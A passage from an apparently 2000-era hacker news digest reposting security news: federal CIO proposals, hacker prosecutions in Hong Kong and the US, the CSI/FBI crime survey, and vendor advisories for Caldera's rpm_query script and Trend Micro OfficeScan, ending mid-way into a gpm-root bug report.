open-source clone of Napster, illustrated the need for debate about
copyright laws in the age of ubiquitous digital distribution channels.
"There are larger questions about the implications of these technologies,"
Sheirer said.
@HWA
76.0 HNS:Mar 24th:FEDERAL CIO NEEDED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Friday 24 March 2000 on 11:29 AM
Former Senate Year 2000 Committee Chairman Sen. Robert
Bennett, said Thursday that the numerous legislative and agency
efforts to address cyber security may need the guidance of a single
"chief information officer" to coordinate the government's cross
agency and trans-industry security measures.
Link: Computer Currents
http://www.currents.net/newstoday/00/03/24/news16.html
Federal CIO Needed for
Web Security
By Brian Krebs, Newsbytes
March 24, 2000
Former Senate Year 2000 Committee Chairman Sen. Robert
Bennett, R-Utah, said Thursday that the numerous legislative
and agency efforts to address cyber security may need the
guidance of a single "chief information officer" to coordinate the
government's cross agency and trans-industry security
measures.
Speaking at a US Chamber of Commerce meeting, "Cyber
Security: The Real Y2K Challenge," Bennett said that, while it
is up to company CEOs to ensure the security of their own
Web sites, the federal government can and should provide a
overarching structure for that effort. Bennett said the Clinton
administration's Critical Infrastructure Assurance Office (CIAO)
- the agency charged with coordinating the federal government's
cyber security efforts - was a good start, but also highlighted a
need for leadership on the issue.
"Every company has a chief information officer, and I think
eventually the government would need its own CIO, maybe even
at the cabinet level position," Bennett said. "But this is not
going to happen quickly."
Over the past few weeks, a handful of public officials have
called for a federal government CIO to coordinate the
government's many efforts. Last week before the House
Subcommittee on Government Management, Information, and
Technology, Chariman Stephen Horn, R-Calif., pointed to the
government's many security management players and asked
whether there shouldn't be one entity coordinating the
government's efforts.
"Y2K underscored the need for a disciplined management
approach to problem solving," Horn said. "That type of
commitment will be equally important as we turn to the second
technological challenge of the New Year - computer security."
Horn then turned to the witnesses, asking, "Could the Koskinen
model work here?"
At today's meeting, Bennett told reporters that, regardless of
the model Congress ultimately chooses, he has heard from
Koskinen himself on the issue.
"He told me that with regard to the Critical Infrastructure
Protection program: 'You have my very best wishes, but you
will do it without me,'" Bennett said.
Bennet said the responsibility for protecting the confidentiality
and security of corporate information rests squarely on the
shoulders of company CEOs, and those who wait for the
government to step in with legislative remedies will find their
sites hacked and their business secrets revealed.
"This is a CEO and survival issue, not something you leave to
the techies," he said. "The reality is that if somebody decides
they want to break into your company and steal your secrets,
they can do that."
Bennett urged CEOs in attendance to shift to the mode of
urgency and cooperation that made Y2K such a non-event, and
emphasized the need for lawmakers and CEOs to take a
"horizontal" view of their organization and how weaknesses in
their companies' systems can affect other companies on the
network.
"We're not thinking horizontally enough in Congress and
industry," Bennett said. "Nobody's interested in stovepiping: I
don't care if your company is secure or not, but I do care if
you're connected to the Internet."
Bennett said that, given the hectic schedule that Congress is
working at this session, it was likely that few of the many
proposed bills to address cyber security would pass this year.
But, he said, the bills were necessary to keep the dialogue
going.
Reported by Newsbytes.com, http://www.newsbytes.com .
(20000323/WIRES ONLINE, LEGAL, BUSINESS/)
(NEWS)(ASIA)(HKG)(00029)
Arescom Provides DSL For Chunghwa Telecom 03/23/00
HONG KONG, CHINA, 2000 MAR 23 (NB) -- By Staff, IT Daily.
Broadband provider Arescom has recently been awarded a
major business contract for 78,000 digital subscriber lines
(DSL) in partnership with one of Taiwan's wireless service
providers, Tecom.
The contract includes the supply and installation of Arescom's
NetDSL 800 ADSL (asynchronous DSL) modem/bridge and the
NetDSL 1000 IP (Internet Protocol) router.
Implementation is expected to start in May and Arescom is
partnering with Nokia for DSLAM products.
NetDSL 1000 can support up to 253 users through a hub. It has
router capabilities already built in. The NetDSL 800 ADSL
modem provides Internet access and bridging functions through
Ethernet and USB (Universal Serial Bus) interfaces.
Reported by Newsbytes.com
@HWA
77.0 HNS:Mar 24th:DETERRENT SENTENCES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Friday 24 March 2000 on 1:45 AM
Three teenage computer hackers were warned yesterday that they
faced deterrent sentences after they admitted selling login names
and passwords stolen from the Internet in the first case of its kind in
Hong Kong.
Link: SCMP
http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000322020710278.asp
Wednesday, March 22, 2000
Teen hackers face
deterrent sentences
ELAINE PAK LI
Three teenage computer hackers were warned
yesterday that they faced deterrent sentences after they
admitted selling login names and passwords stolen from
the Internet in the first case of its kind in Hong Kong.
One of the trio, a student, was also convicted of
downloading songs from the Internet and selling them
for profit.
At Eastern Court, restaurant manager Tam Hei-lun and
clerk Po Yiu-ming, both 19, and student Mak
King-lam, 18, pleaded guilty to a total of 49 charges.
Magistrate Ian Candy remanded them in custody for
sentencing on April 5, pending reports, and said: "It is
precisely these kind of computer crimes which leave
Internet users in fear and make them pause before
conducting even the most basic of transactions.
"These criminal activities should be nipped in the bud
and a deterrent sentence must be imposed."
All the offences took place between March 1998 and
May last year.
David Leung, prosecuting, told the court Po had hacked
into other Internet users' computers and unlawfully
obtained 127 login names and passwords given to
Internet users when they subscribe to an Internet service
provider for a monthly fee and an hourly rate.
The three defendants knew each other through the
Internet and Po had sold some of his illegally obtained
login names and passwords to Tam for $3,000, but
gave others for free to Mak. Tam later resold them for
$1,500.
The three were aware that the information they obtained
was acquired illegally, the magistrate was told.
Mr Leung said the three defendants had hacked into the
accounts of Internet users of Hongkong Telecom IMS
Netvigator, Vision Network Ltd, City Telecom (HK),
Netfront Information Technology and ABC Net, saving
themselves the monthly fees and causing losses to the
account holders.
Tam admitted 14 counts of obtaining access to a
computer with a view to dishonest gain, Po admitted 12
and Mak two.
Mak also admitted 10 charges of selling pirated discs, in
which he downloaded songs from the Internet and sold
200 discs from his own Web site. Each disc contained
100 songs and was priced at $88.
Tam, who asked buyers of the logins to deposit money
into his bank account, also admitted eight counts of
dealing with property known or reasonably believed to
represent proceeds of an indictable offence.
Po admitted a further three charges of criminally
damaging the computers of three users.
@HWA
78.0 HNS:Mar 23rd:SENSITIVE DATA MADE PUBLIC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Thursday 23 March 2000 on 8:32 PM
Consumers who requested online life insurance quotes from the
SelectQuote Web site on Tuesday and Wednesday were apparently
victimized by a software glitch, which caused their personal
information to be left on the company's Web site, wide open.
Link: Security Watch
http://www.securitywatch.com/scripts/news/list.asp?AID=2324
Insurance site exposes sensitive customers' data
(03/23/2000) Consumers who requested online life
insurance quotes from the SelectQuote Web site on Tuesday
and Wednesday were apparently victimized by a software
glitch, which caused their personal information to be left
on the company's Web site, wide open.
The security glitch in the softwareSelectQuote uses, would
have occurred when a form that consumers fill out to request
a quote failed to clear the contents at the end of the process.
This resulted in all personal information (name, address,
current coverage and parents' health histories) from the
previous user being plainly exposed to the next person
requesting a quote.
@HWA
79.0 HNS:Mar 23rd:ALTERING WEB SITES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Thursday 23 March 2000 on 5:32 PM
A Gore computer business has beefed up its security after a
Brazilian hacker got into one of the websites and defaced it.
Link: The Press NZ
http://www.press.co.nz/2000/12/000323x04.htm
Hacker breaches security
to alter Alexandra website
text
By Sonia Gerken
A Gore computer business has beefed up its security after a
Brazilian hacker got into one of the websites it manages and
changed the text.
Clive Wilson Computers Gore managing director Ewen
Whitefield said yesterday the security breach of its domain
hosting machine last month was low level, but "anyone hacking
into our machines is serious."
The hacker changed text on the website of an Alexandra client.
Police had been notified of the breach and the company was
unlikely to pursue it further.
"It annoys us more than anything else. If it was a major security
breach we could chase it back to the United States and Brazil,"
Mr Whitefield said.
If anything the breach proved the company's electronic
"firewalls" were pretty good, stopping the hacker from getting
any further than minimal damage, he said.
Website designer Ken France, of Arthurton, said the hacker
probably found a "tiny little hole" to sneak in through.
It was an old site, designed two years ago.
The breach was annoying and nothing serious - "apart from
getting a laugh at our expense," he said.
There was a big rush of "hits" to the site after the first hacker
got in. Within a week 200 hits more than usual were logged
and three or four of those had changed some text, Mr France
said.
"Some even put their telephone number in.
"It was like 'If you want to know how I got in here give me a
call'," he said.
The company was warned about the hacking by a phone call
from someone claiming to be a website watcher in Australia.
Mr France said the call came an hour after he had looked at
the website and it was all right.
"It's quite strange how they knew. I suspect it was bogus."
Mr Whitefield said the company received an e-mail the day
after the hacking from the Brazilian Internet Society asking
questions about the hacker.
There was no way to verify the authenticity of the e-mail, he
said.
Mr France said the company's tighter security had been
affective.
At times he had been unable to get into sites he designed that
were managed by the company.
"It's good in a way. If I can't get in, how will anyone else," he
said.
@HWA
80.0 HNS:Mar 23rd:SECURITY BREACHES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Thursday 23 March 2000 on 5:28 PM
More than 90 percent of large corporations and government agencies
were the victims of computer security breaches in 1999, according
to a new survey.
Link: APB News
http://www.apbnews.com/newscenter/internetcrime/2000/03/22/crimesurvey0322_01.html
9 of 10 Companies Report Computer
Attacks
Survey Finds Damages Triple as Cybercrime Booms
March 22, 2000
By David Noack
SAN FRANCISCO (APBnews.com) -- More
than 90 percent of large corporations and
government agencies were the victims of
computer security breaches in 1999,
according to a new survey.
The Computer Security Institute's fifth
Computer Crime and Security Survey also
found that the total reported financial losses
have tripled.
The annual survey is conducted with the participation of the San Francisco
FBI Computer Intrusion Squad and aims to increase awareness of security.
This year's survey was based on responses from 643 computer-security
professionals in U.S. corporations, government agencies, financial
institutions, medical institutions and universities.
Only 42 percent of those answering the survey could put a dollar figure on
their financial losses -- reporting the total at $265 million. The average
annual total over the last three years was $120 million.
Widespread and diverse
Patrice Rapalus, director of the Computer
Security Institute, said the survey points to a
disturbing trend.
"Cybercrimes and other information-security
breaches are widespread and diverse," she
said. "Ninety percent of respondents reported
attacks. Furthermore, such incidents can
result in serious damages. ... Clearly, more
must be done in terms of adherence to sound
practices, deployment of sophisticated
technologies, and most importantly, adequate
staffing and training of information-security
practitioners in both the private sector and
government."
The survey also found:
70 percent reported a variety of serious computer security breaches
other than the most common ones of computer viruses, laptop theft
or employee "net abuse." Other examples included theft of
proprietary information, financial fraud, system penetration from
outsiders, denial of service attacks and sabotage of data or
networks.
74 percent acknowledged financial losses due to computer
breaches.
71 percent of respondents detected unauthorized access by
insiders. For the third year in a row, more respondents -- 59 percent
-- cited their Internet connection as a frequent point of attack rather
than their internal systems -- 38 percent -- as a frequent point of
attack.
Financial losses larger
The report said the financial losses in eight of 12 categories were larger
than in any previous year. In addition, financial losses in four categories
were higher than the combined total of the three previous years. For
example, 61 respondents quantified losses due to sabotage of data or
networks for a total of $27 million. The total financial losses due to
sabotage for the previous years combined totaled only $10 million.
As in previous years, the most serious financial losses occurred through
theft of proprietary information, with 66 respondents reporting losses of $66
million and financial fraud and 53 reporting $55 million in losses.
The survey results show that computer crime threats to large corporations
and government agencies come from both inside and outside their
electronic perimeters, confirming trends found in prior surveys.
Bruce J. Gephardt heads the FBI's Northern California office in San
Francisco, which covers 15 counties, including Silicon Valley. He said the
survey helps him decide how to deploy his forces instead of reacting to
computer crises as they occur.
Trends and crises
"The results of the CSI/FBI survey provide us with valuable data," Gephardt
said. "This information not only has been shared with Congress to
underscore the need for additional investigative resources on a national
level, but [it] identifies emerging crime trends and helps me decide how
best to proactively and aggressively assign resources before those 'trends'
become 'crises.'"
CSI, which was established in 1974, is a San Francisco-based association
of information-security professionals.
The FBI, responding to an increase in the criminal targeting of major
components of information and economic infrastructure systems, has
established the National Infrastructure Protection Center (NIPC), which is
located at FBI headquarters, and the Regional Computer Intrusion Squads,
which are located in selected offices throughout the United States.
The NIPC, a joint partnership among federal agencies and private industry,
is designed to serve as the government's lead mechanism for preventing
and responding to cyberattacks on the nation's infrastructure. The Regional
Computer Intrusion Squads investigate violations of the Computer Fraud
and Abuse Act, which includes intrusions to public switched networks,
major computer network intrusions, privacy violations, industrial espionage,
pirated computer software and other crimes.
David Noack is an APBnews.com staff writer (david.noack@apbnews.com).
@HWA
81.0 HNS:Mar 23rd:ATTACK COSTS RISE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ Thursday 23 March 2000 on 3:29 PM
In an annual survey issued on Wednesday, the FBI and the San
Francisco-based Computer Security Institute showed just how
pressing: total verifiable losses in 1999 more than doubled to up to
top $265 million, while more than 90 percent of respondents reported
detecting some form of security breach.
Link: CNNfn
http://cnnfn.com/2000/03/22/technology/wires/hackers_losses_wg/
Hacker attack costs rise
FBI, CSI: Verifiable losses due to poor
security top $265M in 1999
March 22, 2000: 7:30 a.m. ET
SAN FRANCISCO (Reuters) - In a year that saw some of the Internet's best
known sites seriously hit by hacker attacks, few computer users would
question that cyber-security is a pressing concern.
In an annual survey issued on Wednesday, the FBI and the San
Francisco-based Computer Security Institute showed just how pressing: total
verifiable losses in 1999 more than doubled to up to top $265 million, while
more than 90 percent of respondents reported detecting some form of security
breach.
Security experts say a large number of attacks go unrecognized, and the
total is hard to assess, with companies reluctant to admit they've been
vandalized. But the annual survey gives a clear picture of a worsening problem.
"The trends are continuing in the same direction. It's going from bad to
worse in terms of threats from the outside, while the threat from the inside
doesn't go away," said Richard Power, CSI's editorial director.
The fifth annual survey of computer crime and security polled some 640
corporations, banks and government organizations about the state of their
computer systems.
Only 42 percent of these respondents could put a dollar figure on what the
attacks cost them -- but this figure, at $265 million, was more than double the
average annual total over the last three years.
While the most common threats -- computer viruses, laptop theft, or
employee "net abuse" -- continued apace, at least 74 percent of respondents
reported more serious security breaches including theft of proprietary
information, financial fraud, system penetration by outsiders, data or network
sabotage, or "denial of service" attacks designed to take websites out of
commission.
Information theft and financial fraud caused the most severe financial
losses, put at $68 million and $56 million respectively.
But "denial of service" attacks, like the ones that temporarily paralyzed
Yahoo!, eBay, Buy.com, and several other websites in February, are also a
growing problem, Powers said.
Losses traced to denial of service attacks were only $77,000 in 1998, and
by 1999 had risen to just $116,250. The new survey, which reports on numbers
taken before the high-profile February strikes, showed quantified losses up at
more than $8.2 million.
"The denial of service showed that many sites are way, way understaffed
and not adequately secured," Powers said.
"Maybe a half a dozen sites were attacked in that attack, and 150 sites
were hacked into to launch the attack. There is a widespread insecurity among
corporate sites and government sites and the problem is not just technological,
it is human. There are not enough people working on it."
Bruce Gephardt, in charge of the Federal Bureau of Investigation's northern
California office, said the survey revealed how quickly computer security is
becoming a major problem faced by law enforcement, and how more staff was
needed to fight it.
"If the FBI and other law enforcement agencies are to be successful in
combating this continually increasing problem, we cannot always be placed in
a reactive mode, responding to computer crises as they happen," Gephardt
said in a news release.
@HWA
82.0 HNS:Mar 23rd:INDICTED FOR HACKING NASA SERVERS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Thursday 23 March 2000 on 3:28 PM
A suspected computer hacker made his first court appearance
Wednesday after being indicted on charges of breaking into
computers belonging to NASA and the U.S. departments of energy,
defense and transportation, said federal prosecutors.
Link: Miami Herald
http://www.herald.com/content/today/business/brkdocs/079991.htm
Posted at 11:58 p.m. EST Wednesday, March 22, 2000
Man indicted after allegedly hacking into
government computers
SAN FRANCISCO -- (AP) -- A suspected computer hacker made his first court
appearance Wednesday after being indicted on charges of breaking into
computers belonging to NASA and the U.S. departments of energy, defense and
transportation, said federal prosecutors.
Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during the
hearing in San Jose. On March 15, he was indicted on 15 criminal counts,
including unauthorized access of a computer, recklessly causing damage and
interception of electronic communication.
All the counts carry sentences of at least six months and fines of hundreds of
thousands of dollars.
Butler, who also goes by the name of Max Vision, had been an FBI source,
helping agents solve computer crimes, authorities said. He turned himself in on
Tuesday.
Butler's attorney did not return a telephone call seeking comment.
@HWA
83.0 HNS:Mar 23rd:CALDERA SYSTEMS SECURITY ADVISORY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by LogError Thursday 23 March 2000 on 12:19 PM
The OpenLinux package contains a CGI script called rpm_query that
allows a user to obtain a list of all RPM packages installed on that
machine, provided the Apache Web server is running. This could be
used by an intruder to determine what part of the system to attack.
Link: Linux Today
http://linuxtoday.com/stories/18850.html
Caldera Systems Security Advisory: rpm_query allows everyone to list installed rpms
Mar 22, 2000, 23:23 UTC (0 Talkbacks)
Caldera Systems, Inc. Security Advisory
Subject: rpm_query allows everyone to list installed rpms
Advisory number: CSSA-2000-007.1
Issue date: 2000 March, 8
Last change: 2000 March, 14
Cross reference:
1. Problem Description
The OpenLinux package contains a CGI script called rpm_query that allows
a user to obtain a list of all RPM packages installed on that machine,
provided the Apache Web server is running.
This could be used by an intruder to determine what part of the system
to attack.
2. Vulnerable Versions
System Package
-----------------------------------------------------------
OpenLinux Desktop 2.3 All packages previous to
OpenLinux-2.3-17
OpenLinux eServer 2.3 All packages previous to
OpenLinux-2.3-24S
3. Solution
Workaround:
Remove the script by executing:
rm -f /home/httpd/cgi-bin/rpm_query
The proper solution is to upgrade to the latest packages
4. OpenLinux Desktop 2.3
4.1 Location of Fixed Packages
The upgrade packages can be found on Caldera's FTP site at:
ftp://ftp.calderasystems.com/pub/openlinux/updates/2.3/current/RPMS
@HWA
84.0 HNS:Mar 23rd:REMOTE SECURITY MANAGEMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by LogError Thursday 23 March 2000 on 12:14 PM
Businesses can have their network security hosted and managed
remotely using a new service from Network Associates. The
company's myCIO.com service offers an ASP 'infrastructure' which
allows partners such as ISPs, telecoms providers and even
computer resellers to host NAI's products and services online.
Link: VNUNET
http://www.vnunet.com/News/601120
@HWA
85.0 HNS:Mar 23rd:"ANTI-ARAB" BUG
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Thursday 23 March 2000 on 3:29 AM
The head of Microsoft's European and Middle East operations said
on Wednesday the firm was fixing a bug in its Windows 2000
French-language spell-checker which suggested replacing
"anti-stress" with the word "anti-arab."
Link: Wired
http://www.wired.com/news/politics/0,1283,35117,00.html
MS Fixing 'Anti-Arab' Bug
Reuters
7:00 a.m. Mar. 22, 2000 PST
PARIS -- The head of Microsoft's European and Middle East operations said
on Wednesday the firm was fixing a bug in its Windows 2000
French-language spell-checker which suggested replacing "anti-stress"
with the word "anti-arab."
Michel Lacombe, president of Microsoft EMEA, said the problem should be
fixed in "a few weeks" and that customers would be offered a new version
free of charge.
"Microsoft is very sorry about this. We are always sensitive to things
which confuse people and we are very respectful of people getting hurt,"
Lacombe told Reuters.
"Microsoft has no problem with the Arab world, we invest in the Arab
language, and in Arab countries. Our software developers are looking at a
way to fix this and in a few weeks this will be behind us," he added.
France's national CFDT trade union denounced Microsoft for its "racist
turn of phrase."
"As it is not able itself to go directly to court, the CFDT is informing
national anti-racism societies. It will support any criminal action they
should take," the CFDT said in a statement.
Lacombe noted that the bug was in its spell-checker, not its thesaurus.
"That would be worse. We are not trying to give a synonym of anti-stress,
just to help the user solve a spelling problem," he said.
@HWA
86.0 HNS:Mar 23rd:OFFICE 2000 PATCHES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Thursday 23 March 2000 on 3:28 AM
Microsoft posted Service Release 1 (SR-1) to the Web for download.
It is the first collection of patches and fixes for Office 2000 since the
product began shipping last June.
Link: Microsoft
http://officeupdate.microsoft.com/default.asp
@HWA
87.0 HNS:Mar 23rd:SHARING INFORMATION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Thursday 23 March 2000 on 3:16 AM
A new bill aimed at encouraging companies to share information
about hacker attacks would provide firms with a limited exemption
from the Freedom of Information Act.
Link: NewsBytes
http://www.newsbytes.com/pubNews/00/146086.html
Bill Would Protect Firms That Share Hacking Info
By David McGuire, Newsbytes WASHINGTON, DC, U.S.A., 21 Mar 2000, 6:00 AM
CST
A new bill aimed at encouraging companies to share information about
hacker attacks would provide firms with a limited exemption from the
Freedom of Information Act (FOIA).
Set to be introduced by Reps. Tom Davis, R-Va. and Jim Moran, D-Va.,
later this week, the legislation would allow companies to share
information about cyberattacks with law enforcers and industry groups,
without worrying that such information could come back to haunt them,
Davis staffer David Marin said today.
"The public interest will be served by companies coming forth to share
their information" about attacks, Marin said. Too often now companies do
not report cyberattacks for fear that such reports will find their way
into the media, he said.
While the bill would create a limited shelter under FOIA, it is not
intended to allow companies to mask their business dealings, Marin said.
When the legislation is completed it will be "narrowly tailored to
address (information pertaining to) how the attack was done and what was
done to fix the attack," Marin said. The legislation will apply only to
telecommunications and information technology infrastructure attacks.
Used primarily by the media, FOIA allows members of the press and the
public to file legally binding requests for public documents.
FOIA already contains an exemption for ongoing criminal investigations,
by Davis and Moran are aiming to further protect firms that divulge
information about cyberattacks, Marin said.
Reported by Newsbytes.com, http://www.newsbytes.com .
@HWA
88.0 HNS:Mar 23rd:MONITORING WITH GOOD RESULTS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Thursday 23 March 2000 on 2:31 AM
A federal appeals court has upheld a CIA policy allowing agency
officials to monitor employees' Internet use. The policy had helped
convict a federal employee of downloading child pornography on
government time.
Link: GovExec article
http://www.govexec.com/dailyfed/0300/032000m1.htm
Link: US vs. Simons - court's decision
http://www.law.emory.edu/4circuit/feb2000/994238.p.html
GovExec;
March 20, 2000
DAILY BRIEFING
Court upholds agency reviews of
employees' Internet use
By Kellie Lunney
klunney@govexec.com
A federal appeals court has upheld a CIA policy allowing
agency officials to monitor employees' Internet use. The policy
had helped convict a federal employee of downloading child
pornography on government time.
The CIA's Foreign Broadcast Information Service
implemented a policy in June 1998 authorizing "electronic
audits" of employee computers in order to crack down on
non-business related Internet use. Those audits included
reviewing employees' e-mail messages and collecting
information on their Web site visits.
Later that summer, Science Applications International Corp.
(SAIC), which had a contract to manage FBIS' computer
network and monitor inappropriate Internet behavior, alerted
the agency when the keyword "sex" turned up numerous hits in
a firewall database during a routine test. The hits originated
from the computer of Mark L. Simons, an electronic engineer
at FBIS.
FBIS officials then searched Simons' computer and office on
four occasions, eventually compiling enough evidence to indict
him on two counts of knowingly receiving and possessing child
pornography downloaded from the Internet and stored on his
government hard drive.
Simons claimed that his Fourth Amendment rights had been
violated during the searches. But a district court upheld the
searches. Simons was found guilty and was sentenced to 18
months in jail.
The U.S. Court of Appeals for the Fourth Circuit affirmed that
decision in late February, saying that Simons failed to prove
that he had a "legitimate expectation of privacy in the place
searched or the item seized."
According to the appeals court, "In the final analysis, this case
involves an employee's supervisor entering the employee's
government office and retrieving a piece of government
equipment in which the employee had absolutely no
expectation of privacy [due to the agency's Internet
policy]�equipment that the employer knew contained
evidence of crimes committed by the employee in the
employee's office ... Here, there was a conjunction of the
conduct that violated the employer's policy and the conduct
that violated the criminal law."
The court's decision in USA v. Simons (99-4238) is online at
www.law.emory.edu/4circuit/feb2000/994238.p.html.
@HWA
89.0 HNS:Mar 23rd:CRIME FIGHTING LAB
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Thursday 23 March 2000 on 2:15 AM
With an eye toward cracking down on cyber crime, officials at the
College of DuPage on Monday unveiled a new state-of-the-art
computer lab at the college's Suburban Law Enforcement Academy.
Link: Chicago Tribune
http://www.chicagotribune.com/news/metro/dupage/printedition/article/0,2669,SAV-0003210202,FF.html
FIGHTING CRIME ON
COMPUTER
LAB GIFTS LET COLLEGE OFFER CLASS
FULL-TIME
By LeAnn Spencer
Tribune Staff Writer
March 21, 2000
With an eye toward cracking down on cyber crime,
officials at the College of DuPage on Monday unveiled a
new state-of-the-art computer lab at the college's
Suburban Law Enforcement Academy.
There, officers will learn how to track computer criminals,
from pedophiles who prey on children to shysters out to
bilk people of money to hackers who infiltrate confidential
Web sites.
The lab at the Glen Ellyn school also will train officers in
how to conduct on-line investigations, in computer
modeling that will enable them to reconstruct a crime
scene, and in how to present the evidence in court.
The new lab was made possible by a donation from
Microsoft Corp. and Omni Tech Corp. of 51 new
personal computers, screens and keyboards; a printer and
overhead projector; all the necessary software; and
technical support services.
The equipment and software are valued at $250,000,
college officials said, and enable the college to create one
of the nation's few specialized computer crime labs
dedicated to training law enforcement personnel. No
civilians will be able to enroll in the 40-hour, weeklong
classes, which will cost $475 in tuition.
"The industry is very motivated in learning how to tackle
the problems" of computer crime, Bob Herbold, executive
vice president and chief operating officer of Microsoft,
said at a Monday unveiling of the lab.
Until now, the law-enforcement academy has held its
computer crime classes by borrowing computer space
elsewhere on campus, and only when regular classes
were out of session. The new computer lab allows the
academy to offer classes virtually year-round, reaching
literally hundreds of officers and prosecutors.
Already, the academy is receiving attention from police
departments all over the country, as well as Canada,
officials said.
College officials said that there is a real need for the
training as police and prosecutors struggle to keep pace
with the sometimes confusing world of computer crime.
"When this was brand-new technology, it was difficult for
police departments to follow up," said Mike Sullivan,
Naperville police detective and an instructor at the law
enforcement academy.
But understanding the inner workings of computers and
the Internet, officials said, is no different than learning any
kind of new technology, whether it be fingerprinting or the
use of DNA evidence.
One unusual aspect of the lab will be that the police
officers in the class will be able to pose as children and
log on to pornographic Web sites or chat rooms where
Internet users prey on the young. As pedophiles reveal
themselves, they can be investigated and arrested,
officials said.
"It used to be that pedophiles would go to the park and
pick their victims," Sullivan said. "As the Internet came
along, the Internet has become the virtual park."
Such real-life training is invaluable.
"There's no place else that you can go in and see a felony
being committed while you are doing police training,"
Sullivan said.
Sullivan noted that many people wrongly think what they
do on the Internet cannot be traced.
"When a crime is committed on the Internet, it makes it
easier for us to track you. It's like committing a crime and
then leaving your license plate at the scene," he said.
"You can't go on the Internet," he said, "without leaving a
footprint."
@HWA
90.0 HNS:Mar 23rd:HUNTING CROATIAN PIRATES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Thursday 23 March 2000 on 1:49 AM
Three days ago, first coordinated police action against software
pirates in Croatia resulted with confiscation of more than 47
computers, 8536 CD's, 2602 floppy disks and nearly $1 million worth
of software.
Link: Bug On-line (Croatian language)
http://www.bug.hr/vijesti/index.asp?datum=22032000#id3268
@HWA
91.0 HNS:Patch available for OfficeScan vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 24, 2000
Trend Micro has released a patch that eliminates server security
vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier
versions, running on Windows NT 4 server with Internet Information
Server(IIS). ...
Patch available for OfficeScan vulnerability
Posted to BugTraq on March 24, 2000
Security Focus BugTraq ID: 1057
Posted: March 22, 2000
Summary
=======
Trend Micro has released a patch that eliminates server security
vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier
versions, running on Windows NT 4 server with Internet Information
Server (IIS). These versions of OfficeScan allow intruders within a
firewall to invoke OfficeScan CGIs on the server without
authentication - bypassing OfficeScan management console
password protection. These OfficeScan CGIs are intended for
administrator to manage OfficeScan antivirus running on networked
workstations via the OfficeScan management console. By gaining
access to execute these CGIs, hackers can use them to change
OfficeScan antivirus configurations or to uninstall OfficeScan
antivirus on thedesktops.
Issues
======
Trend OfficeScan version 3.51 or earlier versions apply inadequate
security settings on the OfficeScan server CGI components. If a
malicious user, has the ability to connect to the OfficeScan server
via a web browser, these CGIs can be executed to send valid
commands - including uninstall command - to OfficeScan clients. In
addition, OfficeScan's implementation of user authentication in its
management console - password protection - was insufficiently
encrypted, and allows a malicious user to decrypt and gain access
to the OfficeScan management console.
Implementation
==============
Trend Micro has released a patch that will secure access to the
OfficeScan CGIs on the server. The patch program changes the file
permissions on the OfficeScan CGIs, so only administrators can
access and execute them. This patch works only on drives
formatted to use Windows NT file system (NTFS). After applying this
patch, hackers will no longer be able to remotely invoke OfficeScan
CGIs without being authenticated as a administrator by NTFS
security. This patch also prevents hackers, who sniffs for OfficeScan
management console password over the network, from gaining
access to the OfficeScan management console. Access to the
OfficeScan management console or to execute OfficeScan CGIs
now requires NTFS authentication.
Affected Software Versions
==========================
Trend OfficeScan Corporate Edition 3.0
Trend OfficeScan Corporate Edition 3.11
Trend OfficeScan Corporate Edition 3.13
Trend OfficeScan Corporate Edition 3.50
Trend OfficeScan Corporate Edition 3.51
Trend OfficeScan for Microsoft SBS 4.5
This vulnerability is only present when the above software version is
installed on a Windows NT server with IIS. It is not present when the
above software version is installed on Novell NetWare servers or
Windows NT server without IIS.
Patch Availability
==================
OfficeScan Unauthenticated CGI Usage patch can be downloaded
from:
http://www.antivirus.com/download/ofce_patch.htm
More Information
================
Please see the following references for more information related to
this issue.
- Trend Micro Security Bulletin:
http://www.antivirus.com/download/ofce_patch_351.htm
- Frequently Asked Questions: Trend Micro Knowledge Base
http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Trend
MicroTechnical Support is available at
http://www.trend.com/support/default.htm
Acknowledgements
================
Trend Micro thanks Gregory Duchemin
http://www.securite-internet.com and Elias Levy
http://www.securityfocus.com for reporting the OfficeScan server
vulnerability to us, and working with us to protect our customers
@HWA
92.0 HNS:Gpm-root problems
~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 23, 2000
When the user selects one of his/her favourite utility from his/her
own list, gpm-root starts this process with the group and
supplementary groups of the gpm-root daemon ...
Gpm-root problems
Posted to BugTraq on March 23, 2000
I've sent report about the following security hole to the authors of
gpm, but they seemed to ignore the problem. The problem applies to
every gpm version known by me, for example 1.18.1 and 1.19.0.
To exploit this problem, gpm-root must be running on a machine and
the user needs both login to that machine and physical access to
the keyboard and mouse.
